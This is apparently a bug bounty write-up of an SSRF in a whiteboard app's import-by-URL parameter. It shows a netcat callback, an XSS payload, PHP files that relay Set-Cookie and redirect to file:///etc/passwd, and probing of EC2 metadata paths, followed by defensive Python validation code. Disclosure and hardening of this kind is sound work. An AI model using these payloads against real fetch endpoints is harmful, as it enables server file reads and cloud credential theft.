“Exploiting a Single Parameter”

Hisham Mir
Apr 6, 2018 · 5 min read

Hello there friends and all community members. It's been ages since I did a write-up, as I like to work silently. For the past few days I have seen many write-ups while scrolling my Facebook news feed, so I also thought I would do a write-up and contribute to this great community. Enough of the boring words, now let's come to the point :P

I hunted in a HackerOne private program, found many low-to-medium bugs and left the site, as most hunters do :D. After a few days I was going through the website again and there was a whiteboard sketching web app that was running on Flash. *Ughh! Why didn't I see this before :/*
As you guys know, most of these online whiteboard tools have features like add image, upload video, etc. Having a hacker's mindset, we go after the IMPORT BY URL feature, so I also got the idea to look for it.

After I found the import-by-URL parameter I immediately fired up my server and passed this request:

GET /fetch?token=a20378e1_6185_11e6_b4b0_0b0c74443f0c&url=http://54.213.234.107:11111 HTTP/1.1
Host: Site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [REDACTED]
Cookie: [COOKIES HERE]
Connection: keep-alive

Response in my terminal:

hishammir@hishammir:~$ nc -v -l 11111
Listening on [0.0.0.0] (family 0, port 11111)
Connection from [54.xxx.xxx.xxx] port 11111 [tcp/*] accepted (family 2, sport 41400)

SUCCESS!

So the possibility of SSRF was there. I also tried scanning an external host's ports to differentiate between open and closed ports. I used scanme.nmap.org, on which port 22 is open:

Response on hitting a closed port:

Response on hitting an open port:

So to exploit it further I started checking which protocols it would make connections over, and sadly it was only HTTP and HTTPS, so no SSRF :(

As the image fetch endpoint was a GET request, I had a quick thought of opening the endpoint URL in the browser:

/fetch?token=a20378e1_6185_11e6_b4b0_0b0c74443f0c&url=http://54.213.234.107:11111

So the url parameter here was fetching the data from the URL I gave and rendering it locally, on the site itself. As an example, I put google.com in the url parameter and the Google homepage was loaded locally. So moving forward I tried finding XSS using the url parameter, and all I was getting was an Invalid URL error :/

No XSS :/

As I figured that the url parameter was fetching the source code of whatever website we provide, why not let it fetch some JS :P

So what I did was create an HTML file with this simple XSS payload and host it on my server.

<script>alert(document.domain)</script>

The result was:

XSSED!

In the same way, I created a simple PHP file with the code below, hosted it on my server and gave it to the url parameter to fetch and execute.

<?php
// The Set-Cookie header sent by my server was relayed to the browser by the fetch endpoint
header('Set-Cookie: Game over');
?>

Response:

Many of you guys must be thinking why this noob is not trying for RCE :D

After all this I did try hard for RCE or reading server files. So what did I do to try to achieve RCE?

Next, I fiddled with different schemes, but only http and https were possible; $_POST was blocked too, and gopher://, file:// and dict:// seemed to be blocked. But by utilising the same fact of resource sharing I created a script like:

<?php
// Redirect the fetcher to a scheme that is rejected when passed directly in the url parameter
header('Location: file:///etc/passwd');
?>

That would bypass the initial file:// scheme blocking, and the server would itself go and fetch file:///etc/passwd, which gave an Internal Server Error. That was strong motivation that brute-forcing the header with path traversal, such as
header('Location: site.com/../../etc/passwd');
or many more enumerations could have resulted in a successful read, but it takes time to enumerate. No luck :/

Next, what I thought had the strongest relevance was out-of-band data exfiltration. I used my own server, as HTTP was working fine, and retrieved data, which I received in chunks from an "internal server" whose IP was 54.82.xxx.xxx. That is a strong signal of OOB.

So they were using an EC2 instance at 54.82.xxx.xxx from which I received the chunks, but the common ports of that server were closed and it only opened port 80 once file_get_contents() was requested. Utilising this, I tried reading their internal EC2 instances using the url parameter, but there was some type of whitelisting or something!

For example, https://75.101.xxx.xx/latest/user-data/ isn't publicly accessible if opened directly in a browser, but if you put it in the url= parameter the response was different. Similarly, I retrieved the website's IPs via nslookup and tried accessing those IPs through the url parameter, hoping to hit an intranet maybe?
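As an added defensive example (not code from this write-up or the program's own fetcher), here is how an import-by-URL endpoint can shut the three doors used above: the fetched page being rendered and its headers relayed under the site's own origin (the XSS and Set-Cookie results), the Location: file:///etc/passwd redirect bypass, and reaching internal or EC2 metadata addresses. The resolver, the injected do_get client and the image-only policy are assumptions; the magic bytes are standard.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse
ALLOWED_SCHEMES = {"http", "https"}  # gopher://, file://, dict:// never reach the fetcher
MAX_REDIRECTS = 3
# Only these image types may be served back; HTML or a PHP page's output is refused
IMAGE_MAGIC = {b"\x89PNG\r\n\x1a\n": "image/png", b"\xff\xd8\xff": "image/jpeg",
               b"GIF87a": "image/gif", b"GIF89a": "image/gif"}
def is_public_ip(ip):
    # Rejects loopback, RFC 1918, link-local (the 169.254.169.254 metadata endpoint) etc.
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local or a.is_multicast
                or a.is_reserved or a.is_unspecified)

def validate_fetch_url(url, resolver=socket.gethostbyname):
    """Return url unchanged if it is safe to fetch, else raise ValueError."""
    p = urlparse(url)
    if p.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError("scheme not allowed: %r" % p.scheme)
    if not p.hostname or p.username or p.password:
        raise ValueError("missing host or embedded credentials")
    try:
        ip = resolver(p.hostname)
    except OSError as e:
        raise ValueError("unresolvable host: %r" % p.hostname) from e
    if not is_public_ip(ip):
        raise ValueError("host resolves to non-public address %s" % ip)
    return url

def sniff_image_type(body):
    for magic, ctype in IMAGE_MAGIC.items():
        if body.startswith(magic):
            return ctype
    return None

def fetch_image(url, do_get, resolver=socket.gethostbyname):
    """do_get(url) -> (status, headers, body) must NOT follow redirects itself: every
    Location hop is re-validated here, so 'Location: file:///etc/passwd' is refused."""
    for _ in range(MAX_REDIRECTS + 1):
        status, headers, body = do_get(validate_fetch_url(url, resolver))
        if status in (301, 302, 303, 307, 308):
            lower = {k.lower(): v for k, v in headers.items()}
            url = urljoin(url, lower.get("location", ""))
            continue
        ctype = sniff_image_type(body)
        if ctype is None:
            raise ValueError("fetched content is not an allowed image type")
        # Upstream headers are never relayed (no Set-Cookie passthrough); we build our own
        return {"Content-Type": ctype, "X-Content-Type-Options": "nosniff"}, body
    raise ValueError("too many redirects")
```

Resolving the name separately from the connection leaves a DNS rebinding window; in production the HTTP client should connect to the validated IP rather than re-resolving the hostname.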

For all the bounty-conscious guys, a bounty of $2.5k was rewarded for the issue.

For past blog posts, do visit our blog at blog.securitywall.co

Thank you guys for reading this!

Drop your comments below if you have a question ;)

SecurityWall

Securitywall Official Blog
